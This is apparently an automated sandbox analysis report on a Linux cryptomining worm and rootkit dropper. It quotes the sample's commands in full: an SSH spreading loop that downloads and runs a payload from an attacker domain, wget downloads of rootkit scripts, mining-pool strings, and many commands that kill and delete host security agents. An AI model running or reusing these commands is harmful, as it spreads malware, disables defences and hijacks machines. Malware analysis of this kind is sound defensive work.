Loading ...

Play interactive tourEdit tour

Analysis Report 1EC6U55yrZ

Overview

General Information

Joe Sandbox Version:26.0
Analysis ID:901718
Start date:02.07.2019
Start time:07:47:36
Joe Sandbox Product:Cloud
Overall analysis duration:0h 8m 11s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:1EC6U55yrZ
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal100.spre.troj.evad.mine.lin@0/42@22/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsLocal Job Scheduling2Local Job Scheduling2Port MonitorsRootkit1Credential DumpingSecurity Software Discovery11SSH Hijacking1Data from Local System1Data Encrypted1Standard Cryptographic Protocol1
Replication Through Removable MediaCommand-Line Interface11Hidden Files and Directories1Accessibility FeaturesHidden Files and Directories1Network SniffingFile and Directory Discovery1Remote File Copy1Data from Removable MediaExfiltration Over Other Network MediumRemote File Copy1
Drive-by CompromiseScripting13.bash_profile and .bashrc1Path InterceptionDisabling Security Tools1Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingScripting13Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol23
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessFile Deletion11Account ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


Bitcoin Miner:

barindex
Found strings related to Crypto-MiningShow sources
Source: 1EC6U55yrZString found in binary or memory: flags=("stratum+tcp" "cryptonight" "supportxmr.com" "minexmr.com" "poolin.com" "dwarfpool.com" "nanopool.com" "f2pool.com")
Source: 1EC6U55yrZString found in binary or memory: flags=("stratum+tcp" "cryptonight" "supportxmr.com" "minexmr.com" "poolin.com" "dwarfpool.com" "nanopool.com" "f2pool.com")
Source: 1EC6U55yrZString found in binary or memory: flags=("stratum+tcp" "cryptonight" "supportxmr.com" "minexmr.com" "poolin.com" "dwarfpool.com" "nanopool.com" "f2pool.com")

Spreading:

barindex
Found strings indicative of a multi-platform dropperShow sources
Source: 1EC6U55yrZString: declare -a down_method_arr=("wget" "curl" "python" "tcp")
Source: 1EC6U55yrZString: echo "for i in \`cat /tmp/.h\` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no \`whoami\`@\$i \"wget -c -O /tmp/$ShellProceName $DownloadURL_shell;curl -o /tmp/$ShellProceName $DownloadURL_shell;python -c \\\"import urllib;urllib.urlretrieve(\\\\\\\"$DownloadURL_shell\\\\\\\", \\\\\\\"/tmp/$ShellProceName\\\\\\\")\\\";php -r '\\\$f=fopen(\\\"'/tmp/$ShellProceName'\\\",\\\"w\\\");fwrite(\\\$f, implode(\\\"\\\",@file(\\\"'$DownloadURL_shell'\\\")));fclose(\\\$f);';chmod 755 /tmp/$ShellProceName;(exec /tmp/$ShellProceName &> /dev/null &)\" &> /dev/null &); done" >> /tmp/.helpdd
Source: .helpdd.34.drString: for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '\$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite(\$f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose(\$f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)" &> /dev/null &); done
Sample spreads through sshShow sources
Source: /bin/sh (PID: 21967)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21967)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21967)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21967)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982)Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"

Networking:

barindex
Executes the "wget" command typically used for HTTP/S downloadingShow sources
Source: /bin/bash (PID: 22572)Wget executable: /usr/bin/wget -> wget -O /tmp/.../brootkit.sh http://auth.to0ls.com/l/tiktoor/brootkit.sh
Source: /bin/bash (PID: 22614)Wget executable: /usr/bin/wget -> wget -O /tmp/.../install.sh http://auth.to0ls.com/l/tiktoor/install.sh
Source: /bin/bash (PID: 23684)Wget executable: /usr/bin/wget -> wget -O /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /l/ver.txt HTTP/1.0
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /l/tiktoor/brootkit.sh HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: auth.to0ls.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /l/tiktoor/install.sh HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: auth.to0ls.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /l/ver.txt HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: auth.to0ls.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /l/ver.txt HTTP/1.1Host: auth.to0ls.comUser-Agent: curl/7.47.0Accept: */*
Source: global trafficHTTP traffic detected: GET /l/ver.txt HTTP/1.0Host: auth.to0ls.comUser-Agent: Python-urllib/1.17
Source: global trafficHTTP traffic detected: GET /l/ver.txt HTTP/1.0
Source: global trafficHTTP traffic detected: GET /l/sodd/syn HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: auth.to0ls.comConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: auth.to0ls.com
Urls found in memory or binary dataShow sources
Source: 1EC6U55yrZString found in binary or memory: http://$remote_host/l/ver.txt
Source: .helpdd.34.drString found in binary or memory: http://auth.to0ls.com/shell
Source: .helpdd.34.drString found in binary or memory: http://auth.to0ls.com/shell;curl
Source: .helpdd.34.drString found in binary or memory: http://auth.to0ls.com/shell;python
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 42308 -> 443

System Summary:

barindex
Sample contains strings that are potentially command stringsShow sources
Source: Initial samplePotential command found: service safedog stop >/dev/null 2>&1
Source: Initial samplePotential command found: rmmod sddev >/dev/null 2>&1
Source: Initial samplePotential command found: sleep 3
Source: Initial samplePotential command found: killall -9 sdmonitor >/dev/null 2>&1
Source: Initial samplePotential command found: killall sdcc >/dev/null 2>&1
Source: Initial samplePotential command found: killall udcenter >/dev/null 2>&1
Source: Initial samplePotential command found: killall sdcmd >/dev/null 2>&1
Source: Initial samplePotential command found: killall sdsvrd >/dev/null 2>&1
Source: Initial samplePotential command found: killall sdacm >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/sd_uninstall >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/init.d/sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/init.d/safedog >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/init.d/sdboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/init.d/udboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc2.d/S99udboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc3.d/S99udboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc4.d/S99udboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc5.d/S99udboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc2.d/S99sdboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc3.d/S99sdboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc4.d/S99sdboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/rc5.d/S99sdboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdcc >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdmonitor >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sd_autoexmn >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/runsdcc >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/udboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/udcenter >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/udpro >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdalarm >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdsetos >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/safedog_uninstall >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /usr/bin/safedog >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /usr/bin/sdboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdstart >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdsvrd >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdwebdir >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdrtdefendupdate >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdcmd >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdtest >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdui >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sduibin >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdcloud >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/udinstall >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdacm >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/sdrepo >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/uduninstall >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /usr/bin/SDDownload >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/sdinfo.conf >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/udcenter.conf >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/safedog >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/safedog/libs/safedog >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/safedog/libs/sdcommon >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/safedog/libs/sdcc >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/cloudhelper >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/init.d/sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/init.d/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/init.d/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/init.d/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/init.d/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/safedog/sdcc/bin/sdcc >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /usr/bin/sdcc >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/safedog/sdcc/script/runsdcc >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /usr/bin/runsdcc >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/safedog/sdcc/script/sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /usr/bin/sdccboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/safedog/logs/sdcc.log >/dev/null 2>&1
Source: Initial samplePotential command found: killall udpro>/dev/null 2>&1 >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/safedog/sdcc/script/udboot >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/safedog/sdcc/bin/udcenter >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/safedog/sdcc/bin/udpro >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/safedog/sdcc/bin/sdalarm >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/safedog/server/script/sdsetos >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/safedog/script/safedog_uninstall >/dev/null 2>&1
Source: Initial samplePotential command found: rm -rf /etc/sd_uninstall/ >/dev/null 2>&1
Source: Initial samplePotential command found: killall sduibin >/dev/null 2>&1
Source: Initial samplePotential command found: killall -9 aegis_cli >/dev/null 2>&1
Source: Initial samplePotential command found: killall -9 aegis_update >/dev/null 2>&1
Source: Initial samplePotential command found: killall -9 AliYunDun >/dev/null 2>&1
Source: Initial samplePotential command found: killall -9 AliHids >/dev/null 2>&1
Source: Initial samplePotential command found: killall -9 AliYunDunUpdate >/dev/null 2>&1
Source: Initial samplePotential command found: rm -f /etc/init.d/aegis
Source: Initial samplePotential command found: rm -f "/etc/runlevels/default/aegis" >/dev/null 2>&1;
Source: Initial samplePotential command found: rm -f "/etc/rc2.d/S80aegis"
Source: Initial samplePotential command found: rm -f "/etc/rc3.d/S80aegis"
Source: Initial samplePotential command found: rm -f "/etc/rc4.d/S80aegis"
Source: Initial samplePotential command found: rm -f "/etc/rc5.d/S80aegis"
Source: Initial samplePotential command found: rm -f "/etc/rc.d/rc2.d/S80aegis"
Source: Initial samplePotential command found: rm -f "/etc/rc.d/rc3.d/S80aegis"
Source: Initial samplePotential command found: rm -f "/etc/rc.d/rc4.d/S80aegis"
Source: Initial samplePotential command found: rm -f "/etc/rc.d/rc5.d/S80aegis"
Classification labelShow sources
Source: classification engineClassification label: mal100.spre.troj.evad.mine.lin@0/42@22/0

Persistence and Installation Behavior:

barindex
Detected Linux Brootkit rootkitShow sources
Source: brootkit.sh.1192.drIOC string 'BR_ROOTKIT_PATH' found: BR_ROOTKIT_PATH="/usr/include/..."
Source: install.sh.837.drIOC string 'BR_ROOTKIT_PATH' found: BR_ROOTKIT_PATH="/home/$USER/..."
Source: install.sh.837.drIOC string 'BR_ROOTKIT_PATH' found: mkdir -p $BR_ROOTKIT_PATH -m 0777
Source: install.sh.837.drIOC string 'BR_ROOTKIT_PATH' found: cp brootkit.sh $BR_ROOTKIT_PATH
Source: install.sh.837.drIOC string 'BR_ROOTKIT_PATH' found: chmod 777 $BR_ROOTKIT_PATH
Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
Source: /lib/systemd/system-generators/lvm2-activation-generator (PID: 22427)File: /proc/22427/mounts
Sample tries to persist itself using /etc/profileShow sources
Source: /bin/cp (PID: 23641)File: /etc/profile.d/emacs.sh
Sample tries to persist itself using System V runlevelsShow sources
Source: /bin/bash (PID: 19422)File: /etc/rc.local
Source: /bin/ln (PID: 22275)File: /etc/rcS.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22278)File: /etc/rc0.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22282)File: /etc/rc1.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22287)File: /etc/rc2.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22294)File: /etc/rc3.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22299)File: /etc/rc4.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22306)File: /etc/rc5.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22313)File: /etc/rc6.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rc0.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rc1.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rc1.d/S03single -> ../init.d/single
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rc2.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rc3.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rc4.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rc5.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rc6.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/rcS.d/S02diskmanagerd -> ../init.d/diskmanagerd
Sample tries to persist itself using cronShow sources
Source: /bin/bash (PID: 19422)File: /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 19422)File: /etc/crontab
Sets full permissions to files and/or directoriesShow sources
Source: /bin/bash (PID: 19368)Chmod executable with 777: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 19496)Chmod executable with 777: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 22554)Chmod executable with 777: /bin/chmod -> chmod 777 /tmp/...
Source: /tmp/.../install.sh (PID: 23638)Chmod executable with 777: /bin/chmod -> chmod 777 /usr/include/...
Creates hidden files and/or directoriesShow sources
Source: /bin/mkdir (PID: 19367)Directory: ...
Source: /bin/mkdir (PID: 19495)Directory: ...
Source: /bin/mkdir (PID: 22550)Directory: ...
Source: /bin/mkdir (PID: 23617)Directory: ...
Executes python code directly via command shell that might indicate malicious behaviorShow sources
Source: /bin/bash (PID: 23739)Python code executed via command shell: /usr/bin/python -> python -c "import urllib;urllib.urlretrieve('http://auth.to0ls.com/l/ver.txt', '/tmp/vxbkyxrlq2hly2s')"
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/bash (PID: 19368)Chmod executable: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 19413)Chmod executable: /bin/chmod -> chmod 755 /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 19496)Chmod executable: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 21709)Chmod executable: /bin/chmod -> chmod +x /tmp/.helpdd
Source: /bin/bash (PID: 22267)Chmod executable: /bin/chmod -> chmod 755 /etc/init.d/diskmanagerd
Source: /bin/bash (PID: 22536)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 22554)Chmod executable: /bin/chmod -> chmod 777 /tmp/...
Source: /bin/bash (PID: 22651)Chmod executable: /bin/chmod -> chmod 755 /tmp/.../brootkit.sh
Source: /bin/bash (PID: 22652)Chmod executable: /bin/chmod -> chmod 755 /tmp/.../install.sh
Source: /tmp/.../install.sh (PID: 23638)Chmod executable: /bin/chmod -> chmod 777 /usr/include/...
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /bin/bash (PID: 23711)Curl executable: /usr/bin/curl -> curl -o /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/bash (PID: 19341)Grep executable: /bin/grep -> grep PING
Source: /bin/bash (PID: 19384)Grep executable: /bin/grep -> grep [Cc]ent[Oo][Ss]
Source: /bin/bash (PID: 19400)Grep executable: /bin/grep -> grep [Uu]buntu
Source: /bin/bash (PID: 19468)Grep executable: /bin/grep -> grep PING
Source: /bin/bash (PID: 19499)Grep executable: /bin/grep -> grep [Cc]ent[Oo][Ss]
Source: /bin/bash (PID: 19501)Grep executable: /bin/grep -> grep [Uu]buntu
Source: /bin/bash (PID: 19504)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19505)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19513)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19514)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19548)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19549)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19565)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19566)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19585)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19586)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19618)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19619)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19640)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19641)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19677)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19678)Grep executable: /bin/grep -> grep /bin/bash
